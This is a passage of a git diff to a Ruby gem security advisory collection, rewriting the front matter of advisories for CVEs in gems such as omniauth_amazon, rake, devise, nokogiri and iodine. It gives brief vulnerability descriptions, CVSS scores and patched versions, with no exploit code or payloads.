-comments: false
-categories:
-- omniauth_amazon
-advisory:
-  gem: omniauth_amazon
-  cve: 2019-15224
-  ghsa: 333g-rpr4-7hxq
-  url: https://github.com/rubygems.org/issues/2097
-  title: Code execution backdoor in omniauth_amazon
-  date: 2019-08-20
-  description: |
-    The omniauth_amazon gem 1.0.1 for Ruby, as distributed on RubyGems.org, included a
-    code-execution backdoor inserted by a third party.
-
-    Users of an affected version should consider downgrading to the last non-affected version of
-    1.0.1.
-  cvss_v3: 9.8
-  unaffected_versions:
-  - "< 1.0.1"
-  - "> 1.0.1"
-  related:
-    url:
-    - https://github.com/rubygems/rubygems.org/wiki/Gems-yanked-and-accounts-locked#19-aug-2019
----
+---
+layout: advisory
+title: 'CVE-2019-15224 (omniauth_amazon): Code execution backdoor in omniauth_amazon'
+comments: false
+categories:
+- omniauth_amazon
+advisory:
+  gem: omniauth_amazon
+  cve: 2019-15224
+  ghsa: 333g-rpr4-7hxq
+  url: https://github.com/rubygems.org/issues/2097
+  title: Code execution backdoor in omniauth_amazon
+  date: 2019-08-20
+  description: |
+    The omniauth_amazon gem 1.0.1 for Ruby, as distributed on RubyGems.org, included a
+    code-execution backdoor inserted by a third party.
+
+    Users of an affected version should consider downgrading to the last non-affected version of
+    1.0.1.
+  cvss_v3: 9.8
+  unaffected_versions:
+  - "< 1.0.1"
+  - "> 1.0.1"
+  related:
+    url:
+    - https://github.com/rubygems/rubygems.org/wiki/Gems-yanked-and-accounts-locked#19-aug-2019
+---
diff --git a/advisories/_posts/2019-08-21-CVE-2018-20975.md b/advisories/_posts/2019-08-21-CVE-2018-20975.md
index 8212b341..19c735e2 100644
--- a/advisories/_posts/2019-08-21-CVE-2018-20975.md
+++ b/advisories/_posts/2019-08-21-CVE-2018-20975.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2018-20975 (fat_free_crm): fat_free_crm XSS via query parameter of tags_helper
-  method'
-comments: false
-categories:
-- fat_free_crm
-advisory:
-  gem: fat_free_crm
-  cve: 2018-20975
-  ghsa: 4p8f-mmfj-r45g
-  url: https://github.com/fatfreecrm/fat_free_crm/commit/6d60bc8ed010c4eda05d6645c64849f415f68d65
-  date: 2019-08-21
-  title: fat_free_crm XSS via query parameter of tags_helper method
-  description: 'Fat Free CRM before 0.18.1 has XSS in the tags_helper in app/helpers/tags_helper.rb.
-
-    '
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 0.18.1"
----
+---
+layout: advisory
+title: 'CVE-2018-20975 (fat_free_crm): fat_free_crm XSS via query parameter of tags_helper
+  method'
+comments: false
+categories:
+- fat_free_crm
+advisory:
+  gem: fat_free_crm
+  cve: 2018-20975
+  ghsa: 4p8f-mmfj-r45g
+  url: https://github.com/fatfreecrm/fat_free_crm/commit/6d60bc8ed010c4eda05d6645c64849f415f68d65
+  date: 2019-08-21
+  title: fat_free_crm XSS via query parameter of tags_helper method
+  description: 'Fat Free CRM before 0.18.1 has XSS in the tags_helper in app/helpers/tags_helper.rb.
+
+    '
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 0.18.1"
+---
diff --git a/advisories/_posts/2019-08-29-CVE-2020-8130.md b/advisories/_posts/2019-08-29-CVE-2020-8130.md
index ca01184a..50270011 100644
--- a/advisories/_posts/2019-08-29-CVE-2020-8130.md
+++ b/advisories/_posts/2019-08-29-CVE-2020-8130.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2020-8130 (rake): OS Command Injection in Rake'
-comments: false
-categories:
-- rake
-advisory:
-  gem: rake
-  cve: 2020-8130
-  ghsa: jppv-gw3r-w3q8
-  date: 2019-08-29
-  url: https://github.com/advisories/GHSA-jppv-gw3r-w3q8
-  title: OS Command Injection in Rake
-  description: |
-    There is an OS command injection vulnerability in Ruby Rake < 12.3.3 in
-    Rake::FileList when supplying a filename that begins with the pipe character
-    `|`.
-  cvss_v2: 9.3
-  cvss_v3: 8.1
-  patched_versions:
-  - ">= 12.3.3"
----
+---
+layout: advisory
+title: 'CVE-2020-8130 (rake): OS Command Injection in Rake'
+comments: false
+categories:
+- rake
+advisory:
+  gem: rake
+  cve: 2020-8130
+  ghsa: jppv-gw3r-w3q8
+  date: 2019-08-29
+  url: https://github.com/advisories/GHSA-jppv-gw3r-w3q8
+  title: OS Command Injection in Rake
+  description: |
+    There is an OS command injection vulnerability in Ruby Rake < 12.3.3 in
+    Rake::FileList when supplying a filename that begins with the pipe character
+    `|`.
+  cvss_v2: 9.3
+  cvss_v3: 8.1
+  patched_versions:
+  - ">= 12.3.3"
+---
diff --git a/advisories/_posts/2019-09-08-CVE-2019-16109.md b/advisories/_posts/2019-09-08-CVE-2019-16109.md
index 42f44e1d..86546a1b 100644
--- a/advisories/_posts/2019-09-08-CVE-2019-16109.md
+++ b/advisories/_posts/2019-09-08-CVE-2019-16109.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2019-16109 (devise): Devise Gem for Ruby confirmation token validation
-  with a blank string'
-comments: false
-categories:
-- devise
-advisory:
-  gem: devise
-  cve: 2019-16109
-  ghsa: fcjw-8rhj-gwwc
-  url: https://github.com/plataformatec/devise/issues/5071
-  title: Devise Gem for Ruby confirmation token validation with a blank string
-  date: 2019-09-08
-  description: |
-    Devise before 4.7.1 confirms accounts upon receiving a request with a blank
-    confirmation_token, if a database record has a blank value in the confirmation_token column.
-    However, there is no scenario within Devise itself in which such database records would exist.
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 4.7.1"
----
+---
+layout: advisory
+title: 'CVE-2019-16109 (devise): Devise Gem for Ruby confirmation token validation
+  with a blank string'
+comments: false
+categories:
+- devise
+advisory:
+  gem: devise
+  cve: 2019-16109
+  ghsa: fcjw-8rhj-gwwc
+  url: https://github.com/plataformatec/devise/issues/5071
+  title: Devise Gem for Ruby confirmation token validation with a blank string
+  date: 2019-09-08
+  description: |
+    Devise before 4.7.1 confirms accounts upon receiving a request with a blank
+    confirmation_token, if a database record has a blank value in the confirmation_token column.
+    However, there is no scenario within Devise itself in which such database records would exist.
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 4.7.1"
+---
diff --git a/advisories/_posts/2019-09-12-CVE-2019-16892.md b/advisories/_posts/2019-09-12-CVE-2019-16892.md
index 35c4e5b0..46bb3926 100644
--- a/advisories/_posts/2019-09-12-CVE-2019-16892.md
+++ b/advisories/_posts/2019-09-12-CVE-2019-16892.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2019-16892 (rubyzip): Denial of Service in rubyzip ("zip bombs")'
-comments: false
-categories:
-- rubyzip
-advisory:
-  gem: rubyzip
-  cve: 2019-16892
-  ghsa: 5m2v-hc64-56h6
-  url: https://github.com/rubyzip/rubyzip/pull/403
-  title: Denial of Service in rubyzip ("zip bombs")
-  date: 2019-09-12
-  description: |
-    In Rubyzip before 1.3.0, a crafted ZIP file can bypass application
-    checks on ZIP entry sizes because data about the uncompressed size
-    can be spoofed. This allows attackers to cause a denial of service
-    (disk consumption).
-  cvss_v3: 5.5
-  patched_versions:
-  - ">= 1.3.0"
----
+---
+layout: advisory
+title: 'CVE-2019-16892 (rubyzip): Denial of Service in rubyzip ("zip bombs")'
+comments: false
+categories:
+- rubyzip
+advisory:
+  gem: rubyzip
+  cve: 2019-16892
+  ghsa: 5m2v-hc64-56h6
+  url: https://github.com/rubyzip/rubyzip/pull/403
+  title: Denial of Service in rubyzip ("zip bombs")
+  date: 2019-09-12
+  description: |
+    In Rubyzip before 1.3.0, a crafted ZIP file can bypass application
+    checks on ZIP entry sizes because data about the uncompressed size
+    can be spoofed. This allows attackers to cause a denial of service
+    (disk consumption).
+  cvss_v3: 5.5
+  patched_versions:
+  - ">= 1.3.0"
+---
diff --git a/advisories/_posts/2019-09-23-CVE-2019-16145.md b/advisories/_posts/2019-09-23-CVE-2019-16145.md
index 4527ae73..87d35e1f 100644
--- a/advisories/_posts/2019-09-23-CVE-2019-16145.md
+++ b/advisories/_posts/2019-09-23-CVE-2019-16145.md
@@ -1,19 +1,19 @@
----
-layout: advisory
-title: 'CVE-2019-16145 (padrino-contrib): padrino-contrib XSS via caption parameter
-  of breadcrumbs helper'
-comments: false
-categories:
-- padrino-contrib
-advisory:
-  gem: padrino-contrib
-  cve: 2019-16145
-  ghsa: rwpr-83g3-96g7
-  url: https://github.com/padrino/padrino-contrib/pull/35
-  date: 2019-09-23
-  title: padrino-contrib XSS via caption parameter of breadcrumbs helper
-  description: |
-    The breadcrumbs contributed module through 0.2.0 for Padrino Framework
-    allows XSS via a caption.
-  cvss_v3: 6.1
----
+---
+layout: advisory
+title: 'CVE-2019-16145 (padrino-contrib): padrino-contrib XSS via caption parameter
+  of breadcrumbs helper'
+comments: false
+categories:
+- padrino-contrib
+advisory:
+  gem: padrino-contrib
+  cve: 2019-16145
+  ghsa: rwpr-83g3-96g7
+  url: https://github.com/padrino/padrino-contrib/pull/35
+  date: 2019-09-23
+  title: padrino-contrib XSS via caption parameter of breadcrumbs helper
+  description: |
+    The breadcrumbs contributed module through 0.2.0 for Padrino Framework
+    allows XSS via a caption.
+  cvss_v3: 6.1
+---
diff --git a/advisories/_posts/2019-09-23-CVE-2019-16377.md b/advisories/_posts/2019-09-23-CVE-2019-16377.md
index b2624af4..818fd8aa 100644
--- a/advisories/_posts/2019-09-23-CVE-2019-16377.md
+++ b/advisories/_posts/2019-09-23-CVE-2019-16377.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2019-16377 (consul): Consul gem insufficient authentication check - Multiple
-  powers in one controller are not always checked correctly'
-comments: false
-categories:
-- consul
-advisory:
-  gem: consul
-  cve: 2019-16377
-  ghsa: 8jhx-9gf4-hhf5
-  url: https://github.com/makandra/consul/issues/49
-  title: Consul gem insufficient authentication check - Multiple powers in one controller
-    are not always checked correctly
-  date: 2019-09-23
-  description: |
-    With the consul ruby gem before 1.0.3, if a controller checks multiple powers
-    using `:if` or `:except` conditions, these conditions are erroneously applied
-    to all power checks in that controller. This can lead to skipped power checks
-    and hence unauthenticated access to certain controller actions.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.0.3"
----
+---
+layout: advisory
+title: 'CVE-2019-16377 (consul): Consul gem insufficient authentication check - Multiple
+  powers in one controller are not always checked correctly'
+comments: false
+categories:
+- consul
+advisory:
+  gem: consul
+  cve: 2019-16377
+  ghsa: 8jhx-9gf4-hhf5
+  url: https://github.com/makandra/consul/issues/49
+  title: Consul gem insufficient authentication check - Multiple powers in one controller
+    are not always checked correctly
+  date: 2019-09-23
+  description: |
+    With the consul ruby gem before 1.0.3, if a controller checks multiple powers
+    using `:if` or `:except` conditions, these conditions are erroneously applied
+    to all power checks in that controller. This can lead to skipped power checks
+    and hence unauthenticated access to certain controller actions.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.0.3"
+---
diff --git a/advisories/_posts/2019-09-27-CVE-2019-16676.md b/advisories/_posts/2019-09-27-CVE-2019-16676.md
index 7bb17df2..9d1372e3 100644
--- a/advisories/_posts/2019-09-27-CVE-2019-16676.md
+++ b/advisories/_posts/2019-09-27-CVE-2019-16676.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2019-16676 (simple_form): simple_form Gem for Ruby Incorrect Access Control
-  for forms based on user input'
-comments: false
-categories:
-- simple_form
-advisory:
-  gem: simple_form
-  cve: 2019-16676
-  ghsa: r74q-gxcg-73hx
-  url: https://github.com/plataformatec/simple_form/security/advisories/GHSA-r74q-gxcg-73hx
-  title: simple_form Gem for Ruby Incorrect Access Control for forms based on user
-    input
-  date: 2019-09-27
-  description: |
-    Simple Form before 5.0 has Incorrect Access Control in `file_method?` in `lib/simple_form/form_builder.rb`,
-    because a user-supplied string is invoked as a method call.
-
-    This only happens for pages that build forms based on user input.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 5.0"
----
+---
+layout: advisory
+title: 'CVE-2019-16676 (simple_form): simple_form Gem for Ruby Incorrect Access Control
+  for forms based on user input'
+comments: false
+categories:
+- simple_form
+advisory:
+  gem: simple_form
+  cve: 2019-16676
+  ghsa: r74q-gxcg-73hx
+  url: https://github.com/plataformatec/simple_form/security/advisories/GHSA-r74q-gxcg-73hx
+  title: simple_form Gem for Ruby Incorrect Access Control for forms based on user
+    input
+  date: 2019-09-27
+  description: |
+    Simple Form before 5.0 has Incorrect Access Control in `file_method?` in `lib/simple_form/form_builder.rb`,
+    because a user-supplied string is invoked as a method call.
+
+    This only happens for pages that build forms based on user input.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 5.0"
+---
diff --git a/advisories/_posts/2019-10-07-CVE-2024-22050.md b/advisories/_posts/2019-10-07-CVE-2024-22050.md
index 2f7c2a69..40b2e315 100644
--- a/advisories/_posts/2019-10-07-CVE-2024-22050.md
+++ b/advisories/_posts/2019-10-07-CVE-2024-22050.md
@@ -1,53 +1,53 @@
----
-layout: advisory
-title: 'CVE-2024-22050 (iodine): Malicious URL drafting attack against iodines static
-  file server may allow path traversal'
-comments: false
-categories:
-- iodine
-advisory:
-  gem: iodine
-  cve: 2024-22050
-  ghsa: 85rf-xh54-whp3
-  url: https://github.com/boazsegev/iodine/security/advisories/GHSA-85rf-xh54-whp3
-  title: Malicious URL drafting attack against iodines static file server may allow
-    path traversal
-  date: 2019-10-07
-  description: |
-    ### Impact
-
-    A path traversal vulnerability was detected in iodine's static
-    file service. This vulnerability effects any application running
-    iodine's static file server on an effected iodine version.
-
-    Malicious URL drafting may cause the static file server to attempt
-    a response containing data from files that shouldn't be normally
-    accessible from the public folder.
-
-    ### Patches
-
-    The vulnerability was patched in version 0.7.34. Please upgrade
-    to the latest version.
-
-    ### Workarounds
-
-    A possible workaround would be to disable the static file service
-    and it's `X-Sendfile` support, sending static files using nginx
-    or a source code solution (sending the data dynamically).
-
-    However, it would be better to upgrade iodine to the latest
-    version, as it also contains non-security related fixes.
-
-    ### For more information
-    If you have any questions or comments about this advisory:
-    * Email [Boaz Segev](https://github.com/boazsegev)
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 0.7.34"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-22050
-    - https://github.com/boazsegev/iodine/security/advisories/GHSA-85rf-xh54-whp3
-    - https://github.com/boazsegev/iodine/commit/5558233fb7defda706b4f9c87c17759705949889
-    - https://github.com/advisories/GHSA-85rf-xh54-whp3
----
+---
+layout: advisory
+title: 'CVE-2024-22050 (iodine): Malicious URL drafting attack against iodines static
+  file server may allow path traversal'
+comments: false
+categories:
+- iodine
+advisory:
+  gem: iodine
+  cve: 2024-22050
+  ghsa: 85rf-xh54-whp3
+  url: https://github.com/boazsegev/iodine/security/advisories/GHSA-85rf-xh54-whp3
+  title: Malicious URL drafting attack against iodines static file server may allow
+    path traversal
+  date: 2019-10-07
+  description: |
+    ### Impact
+
+    A path traversal vulnerability was detected in iodine's static
+    file service. This vulnerability effects any application running
+    iodine's static file server on an effected iodine version.
+
+    Malicious URL drafting may cause the static file server to attempt
+    a response containing data from files that shouldn't be normally
+    accessible from the public folder.
+
+    ### Patches
+
+    The vulnerability was patched in version 0.7.34. Please upgrade
+    to the latest version.
+
+    ### Workarounds
+
+    A possible workaround would be to disable the static file service
+    and it's `X-Sendfile` support, sending static files using nginx
+    or a source code solution (sending the data dynamically).
+
+    However, it would be better to upgrade iodine to the latest
+    version, as it also contains non-security related fixes.
+
+    ### For more information
+    If you have any questions or comments about this advisory:
+    * Email [Boaz Segev](https://github.com/boazsegev)
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 0.7.34"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-22050
+    - https://github.com/boazsegev/iodine/security/advisories/GHSA-85rf-xh54-whp3
+    - https://github.com/boazsegev/iodine/commit/5558233fb7defda706b4f9c87c17759705949889
+    - https://github.com/advisories/GHSA-85rf-xh54-whp3
+---
diff --git a/advisories/_posts/2019-10-14-CVE-2019-17383.md b/advisories/_posts/2019-10-14-CVE-2019-17383.md
index 3012cc9f..0464c780 100644
--- a/advisories/_posts/2019-10-14-CVE-2019-17383.md
+++ b/advisories/_posts/2019-10-14-CVE-2019-17383.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2019-17383 (netaddr): netaddr world-writeable file permissions'
-comments: false
-categories:
-- netaddr
-advisory:
-  gem: netaddr
-  cve: 2019-17383
-  ghsa: 49pj-69vf-c689
-  url: https://github.com/dspinhirne/netaddr-rb/pull/20
-  date: 2019-10-14
-  title: netaddr world-writeable file permissions
-  description: |
-    The netaddr gem before 2.0.4 for Ruby has misconfigured file permissions,
-    such that a gem install may result in 0777 permissions in the target filesystem.
-  cvss_v3: 9.8
-  patched_versions:
-  - "~> 1.5.3"
-  - ">= 2.0.4"
----
+---
+layout: advisory
+title: 'CVE-2019-17383 (netaddr): netaddr world-writeable file permissions'
+comments: false
+categories:
+- netaddr
+advisory:
+  gem: netaddr
+  cve: 2019-17383
+  ghsa: 49pj-69vf-c689
+  url: https://github.com/dspinhirne/netaddr-rb/pull/20
+  date: 2019-10-14
+  title: netaddr world-writeable file permissions
+  description: |
+    The netaddr gem before 2.0.4 for Ruby has misconfigured file permissions,
+    such that a gem install may result in 0777 permissions in the target filesystem.
+  cvss_v3: 9.8
+  patched_versions:
+  - "~> 1.5.3"
+  - ">= 2.0.4"
+---
diff --git a/advisories/_posts/2019-10-22-CVE-2019-15587.md b/advisories/_posts/2019-10-22-CVE-2019-15587.md
index 5f6bec99..be1e7735 100644
--- a/advisories/_posts/2019-10-22-CVE-2019-15587.md
+++ b/advisories/_posts/2019-10-22-CVE-2019-15587.md
@@ -1,20 +1,20 @@
----
-layout: advisory
-title: 'CVE-2019-15587 (loofah): Loofah XSS Vulnerability'
-comments: false
-categories:
-- loofah
-advisory:
-  gem: loofah
-  cve: 2019-15587
-  ghsa: c3gv-9cxf-6f57
-  url: https://github.com/flavorjones/loofah/issues/171
-  title: Loofah XSS Vulnerability
-  date: 2019-10-22
-  description: |
-    In the Loofah gem, through v2.3.0, unsanitized JavaScript may occur in
-    sanitized output when a crafted SVG element is republished.
-  cvss_v3: 6.4
-  patched_versions:
-  - ">= 2.3.1"
----
+---
+layout: advisory
+title: 'CVE-2019-15587 (loofah): Loofah XSS Vulnerability'
+comments: false
+categories:
+- loofah
+advisory:
+  gem: loofah
+  cve: 2019-15587
+  ghsa: c3gv-9cxf-6f57
+  url: https://github.com/flavorjones/loofah/issues/171
+  title: Loofah XSS Vulnerability
+  date: 2019-10-22
+  description: |
+    In the Loofah gem, through v2.3.0, unsanitized JavaScript may occur in
+    sanitized output when a crafted SVG element is republished.
+  cvss_v3: 6.4
+  patched_versions:
+  - ">= 2.3.1"
+---
diff --git a/advisories/_posts/2019-10-24-CVE-2019-18409.md b/advisories/_posts/2019-10-24-CVE-2019-18409.md
index 6f3ff171..a4263fec 100644
--- a/advisories/_posts/2019-10-24-CVE-2019-18409.md
+++ b/advisories/_posts/2019-10-24-CVE-2019-18409.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2019-18409 (ruby_parser-legacy): ruby_parser-legacy world writable files
-  allow local privilege escalation'
-comments: false
-categories:
-- ruby_parser-legacy
-advisory:
-  gem: ruby_parser-legacy
-  cve: 2019-18409
-  ghsa: hhwc-8g49-j8jx
-  url: https://github.com/zenspider/ruby_parser-legacy/issues/1
-  title: ruby_parser-legacy world writable files allow local privilege escalation
-  date: 2019-10-24
-  description: |
-    The ruby_parser-legacy (aka legacy) gem 1.0.0 for Ruby allows local
-    privilege escalation because of world-writable files. For example,
-    if the brakeman gem (which has a legacy dependency) 4.5.0 through 4.7.0 is used,
-    a local user can insert malicious code into the
-    ruby_parser-legacy-1.0.0/lib/ruby_parser/legacy/ruby_parser.rb file.
-  cvss_v2: 4.6
-  cvss_v3: 7.8
----
+---
+layout: advisory
+title: 'CVE-2019-18409 (ruby_parser-legacy): ruby_parser-legacy world writable files
+  allow local privilege escalation'
+comments: false
+categories:
+- ruby_parser-legacy
+advisory:
+  gem: ruby_parser-legacy
+  cve: 2019-18409
+  ghsa: hhwc-8g49-j8jx
+  url: https://github.com/zenspider/ruby_parser-legacy/issues/1
+  title: ruby_parser-legacy world writable files allow local privilege escalation
+  date: 2019-10-24
+  description: |
+    The ruby_parser-legacy (aka legacy) gem 1.0.0 for Ruby allows local
+    privilege escalation because of world-writable files. For example,
+    if the brakeman gem (which has a legacy dependency) 4.5.0 through 4.7.0 is used,
+    a local user can insert malicious code into the
+    ruby_parser-legacy-1.0.0/lib/ruby_parser/legacy/ruby_parser.rb file.
+  cvss_v2: 4.6
+  cvss_v3: 7.8
+---
diff --git a/advisories/_posts/2019-10-31-CVE-2019-13117.md b/advisories/_posts/2019-10-31-CVE-2019-13117.md
index 8100513a..e2f2fc5d 100644
--- a/advisories/_posts/2019-10-31-CVE-2019-13117.md
+++ b/advisories/_posts/2019-10-31-CVE-2019-13117.md
@@ -1,87 +1,87 @@
----
-layout: advisory
-title: 'CVE-2019-13117 (nokogiri): Nokogiri gem, via libxslt, is affected by multiple
-  vulnerabilities'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2019-13117
-  ghsa: 4hm9-844j-jmxp
-  url: https://github.com/sparklemotion/nokogiri/issues/1943
-  title: Nokogiri gem, via libxslt, is affected by multiple vulnerabilities
-  date: 2019-10-31
-  description: |
-    Nokogiri v1.10.5 has been released.
-
-    This is a security release. It addresses three CVEs in upstream libxml2,
-    for which details are below.
-
-    If you're using your distro's system libraries, rather than Nokogiri's
-    vendored libraries, there's no security need to upgrade at this time,
-    though you may want to check with your distro whether they've patched this
-    (Canonical has patched Ubuntu packages). Note that libxslt 1.1.34 addresses
-    these vulnerabilities.
-
-    Full details about the security update are available in Github Issue
-    [#1943] https://github.com/sparklemotion/nokogiri/issues/1943.
-
-    ---
-
-    CVE-2019-13117
-
-    https://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-13117.html
-
-    Priority: Low
-
-    Description: In numbers.c in libxslt 1.1.33, an xsl:number with certain format strings
-    could lead to a uninitialized read in xsltNumberFormatInsertNumbers. This
-    could allow an attacker to discern whether a byte on the stack contains the
-    characters A, a, I, i, or 0, or any other character.
-
-    Patched with commit https://gitlab.gnome.org/GNOME/libxslt/commit/c5eb6cf3aba0af048596106ed839b4ae17ecbcb1
-
-    ---
-
-    CVE-2019-13118
-
-    https://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-13118.html
-
-    Priority: Low
-
-    Description: In numbers.c in libxslt 1.1.33, a type holding grouping characters of an
-    xsl:number instruction was too narrow and an invalid character/length
-    combination could be passed to xsltNumberFormatDecimal, leading to a read
-    of uninitialized stack data
-
-    Patched with commit https://gitlab.gnome.org/GNOME/libxslt/commit/6ce8de69330783977dd14f6569419489875fb71b
-
-    ---
-
-    CVE-2019-18197
-
-    https://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-18197.html
-
-    Priority: Medium
-
-    Description: In xsltCopyText in transform.c in libxslt 1.1.33, a pointer variable isn't
-    reset under certain circumstances. If the relevant memory area happened to
-    be freed and reused in a certain way, a bounds check could fail and memory
-    outside a buffer could be written to, or uninitialized data could be
-    disclosed.
-
-    Patched with commit https://gitlab.gnome.org/GNOME/libxslt/commit/2232473733b7313d67de8836ea3b29eec6e8e285
-  patched_versions:
-  - ">= 1.10.5"
-  related:
-    cve:
-    - 2019-13118
-    - 2019-18197
-    url:
-    - https://groups.google.com/d/msg/ruby-security-ann/-Wq4aouIA3Q/yc76ZHemBgAJ
-    - https://usn.ubuntu.com/4164-1/
-    - https://gitlab.gnome.org/GNOME/libxslt/commit/c5eb6cf3aba0af048596106ed839b4ae17ecbcb1
-    - https://gitlab.gnome.org/GNOME/libxslt/commit/6ce8de69330783977dd14f6569419489875fb71b
-    - https://gitlab.gnome.org/GNOME/libxslt/commit/2232473733b7313d67de8836ea3b29eec6e8e285
----
+---
+layout: advisory
+title: 'CVE-2019-13117 (nokogiri): Nokogiri gem, via libxslt, is affected by multiple
+  vulnerabilities'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2019-13117
+  ghsa: 4hm9-844j-jmxp
+  url: https://github.com/sparklemotion/nokogiri/issues/1943
+  title: Nokogiri gem, via libxslt, is affected by multiple vulnerabilities
+  date: 2019-10-31
+  description: |
+    Nokogiri v1.10.5 has been released.
+
+    This is a security release. It addresses three CVEs in upstream libxml2,
+    for which details are below.
+
+    If you're using your distro's system libraries, rather than Nokogiri's
+    vendored libraries, there's no security need to upgrade at this time,
+    though you may want to check with your distro whether they've patched this
+    (Canonical has patched Ubuntu packages). Note that libxslt 1.1.34 addresses
+    these vulnerabilities.
+
+    Full details about the security update are available in Github Issue
+    [#1943] https://github.com/sparklemotion/nokogiri/issues/1943.
+
+    ---
+
+    CVE-2019-13117
+
+    https://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-13117.html
+
+    Priority: Low
+
+    Description: In numbers.c in libxslt 1.1.33, an xsl:number with certain format strings
+    could lead to a uninitialized read in xsltNumberFormatInsertNumbers. This
+    could allow an attacker to discern whether a byte on the stack contains the
+    characters A, a, I, i, or 0, or any other character.
+
+    Patched with commit https://gitlab.gnome.org/GNOME/libxslt/commit/c5eb6cf3aba0af048596106ed839b4ae17ecbcb1
+
+    ---
+
+    CVE-2019-13118
+
+    https://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-13118.html
+
+    Priority: Low
+
+    Description: In numbers.c in libxslt 1.1.33, a type holding grouping characters of an
+    xsl:number instruction was too narrow and an invalid character/length
+    combination could be passed to xsltNumberFormatDecimal, leading to a read
+    of uninitialized stack data
+
+    Patched with commit https://gitlab.gnome.org/GNOME/libxslt/commit/6ce8de69330783977dd14f6569419489875fb71b
+
+    ---
+
+    CVE-2019-18197
+
+    https://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-18197.html
+
+    Priority: Medium
+
+    Description: In xsltCopyText in transform.c in libxslt 1.1.33, a pointer variable isn't
+    reset under certain circumstances. If the relevant memory area happened to
+    be freed and reused in a certain way, a bounds check could fail and memory
+    outside a buffer could be written to, or uninitialized data could be
+    disclosed.
+
+    Patched with commit https://gitlab.gnome.org/GNOME/libxslt/commit/2232473733b7313d67de8836ea3b29eec6e8e285
+  patched_versions:
+  - ">= 1.10.5"
+  related:
+    cve:
+    - 2019-13118
+    - 2019-18197
+    url:
+    - https://groups.google.com/d/msg/ruby-security-ann/-Wq4aouIA3Q/yc76ZHemBgAJ
+    - https://usn.ubuntu.com/4164-1/
+    - https://gitlab.gnome.org/GNOME/libxslt/commit/c5eb6cf3aba0af048596106ed839b4ae17ecbcb1
+    - https://gitlab.gnome.org/GNOME/libxslt/commit/6ce8de69330783977dd14f6569419489875fb71b
+    - https://gitlab.gnome.org/GNOME/libxslt/commit/2232473733b7313d67de8836ea3b29eec6e8e285
+---
diff --git a/advisories/_posts/2019-11-09-CVE-2019-18841.md b/advisories/_posts/2019-11-09-CVE-2019-18841.md
index f5adc85b..7b062e4d 100644
--- a/advisories/_posts/2019-11-09-CVE-2019-18841.md
+++ b/advisories/_posts/2019-11-09-CVE-2019-18841.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2019-18841 (chartkick): Prototype Pollution in Chartkick.js 3.1.x'
-comments: false
-categories:
-- chartkick
-advisory:
-  gem: chartkick
-  cve: 2019-18841
-  ghsa: 5pm8-492c-92p5
-  url: https://github.com/ankane/chartkick.js/issues/117
-  title: Prototype Pollution in Chartkick.js 3.1.x
-  date: 2019-11-09
-  description: |
-    A specially crafted response in data loaded via URL
-    can cause prototype pollution in JavaScript.
-  cvss_v3: 7.3
-  unaffected_versions:
-  - "< 3.1.0"
-  patched_versions:
-  - ">= 3.3.0"
----
+---
+layout: advisory
+title: 'CVE-2019-18841 (chartkick): Prototype Pollution in Chartkick.js 3.1.x'
+comments: false
+categories:
+- chartkick
+advisory:
+  gem: chartkick
+  cve: 2019-18841
+  ghsa: 5pm8-492c-92p5
+  url: https://github.com/ankane/chartkick.js/issues/117
+  title: Prototype Pollution in Chartkick.js 3.1.x
+  date: 2019-11-09
+  description: |
+    A specially crafted response in data loaded via URL
+    can cause prototype pollution in JavaScript.
+  cvss_v3: 7.3
+  unaffected_versions:
+  - "< 3.1.0"
+  patched_versions:
+  - ">= 3.3.0"
+---
diff --git a/advisories/_posts/2019-11-14-CVE-2019-18848.md b/advisories/_posts/2019-11-14-CVE-2019-18848.md
index c9a2d0d2..1380784e 100644
--- a/advisories/_posts/2019-11-14-CVE-2019-18848.md
+++ b/advisories/_posts/2019-11-14-CVE-2019-18848.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2019-18848 (json-jwt): json-jwt improper input validation due to lack
-  of element count when splitting string'
-comments: false
-categories:
-- json-jwt
-advisory:
-  gem: json-jwt
-  cve: 2019-18848
-  ghsa: cff7-6h4q-q5pj
-  url: https://github.com/nov/json-jwt/commit/ada16e772906efdd035e3df49cb2ae372f0f948a
-  date: 2019-11-14
-  title: json-jwt improper input validation due to lack of element count when splitting
-    string
-  description: |
-    The json-jwt gem before 1.11.0 for Ruby lacks an element count during
-    the splitting of a JWE string.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.11.0"
----
+---
+layout: advisory
+title: 'CVE-2019-18848 (json-jwt): json-jwt improper input validation due to lack
+  of element count when splitting string'
+comments: false
+categories:
+- json-jwt
+advisory:
+  gem: json-jwt
+  cve: 2019-18848
+  ghsa: cff7-6h4q-q5pj
+  url: https://github.com/nov/json-jwt/commit/ada16e772906efdd035e3df49cb2ae372f0f948a
+  date: 2019-11-14
